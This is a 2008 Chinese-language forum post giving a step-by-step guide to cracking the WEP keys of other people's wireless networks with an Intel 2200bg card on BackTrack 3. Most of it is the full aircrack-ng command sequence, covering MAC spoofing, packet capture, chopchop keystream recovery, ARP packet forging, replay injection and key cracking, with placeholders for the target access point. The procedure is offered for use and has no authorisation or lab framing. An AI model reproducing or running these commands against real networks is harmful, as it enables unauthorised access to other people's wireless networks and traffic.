我是个实用主义者。这段时间一直在研究如何用笔记本内置的INTEL 2200bg 无线网卡破解wep,10天前,实现有客户端注入式破解,经过一个星期的摸索,终于又实现无客户端wep破解。现与兄弟们共享之!需要说明的是,由于目前已经被广泛使用的bt3正式版对2200网卡支持不彻底,建议兄弟们回到bt3的试用版进行破解尝试,此文是在bt3的正式版未出之前编写。 说废话没用,还是看图说话比较现实。
下面是所有的命令集(顺便说一句,很多朋友很烦“回复后才能见到内容”,但我还是要设置,一是为了增加论坛人气,二是为了让更多的兄弟可以浏览,不至于很快下沉。话说回来,写帖子的人不厌其烦的一次又一次的试验、修改,一个字一个字的敲出来,看的兄弟,甚至连回复一下,都觉得烦,这样的情绪,是不是有点说不过去?^_^)
airmon-ng start eth1(电脑不同,接口有可能未eth0,下同) modprobe ipw2200 rtap-iface=1 iwconfig eth1 key s:fakekey iwconfig eth1 mode managed ifconfig eth1 up hw ether 00:11:22:33:44:55 airodump-ng --ivs -w 1 -c 6 eth1
aireplay-ng -4 -e AP的essid -a AP的mac -h 001122334455 -i rtap0 eth1 packetforge-ng -0 -a AP的mac -h 001122334455 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-*.xor -w rap
其中,replay_dec-*.xor为你得到的xor文件的全称,可用ls命令查看,然后拷贝、粘贴过来,-w后面跟的tqp是文件名,可以随便选取。 aireplay-ng -2 -r rap eth1 (这个命令里的rap必须和上条命令里的rap一样) aircrack-ng -n 64 *.ivs (*.ivs可以通过ls命令查看,也可以直接输入*.ivs,此时,程序将分析你root文件夹里存储的所有ivs文件)
[此贴子已经被作者于2008-6-16 14:37:22编辑过] [ 本帖最后由 liyg 于 2008-10-16 11:34 编辑 ] |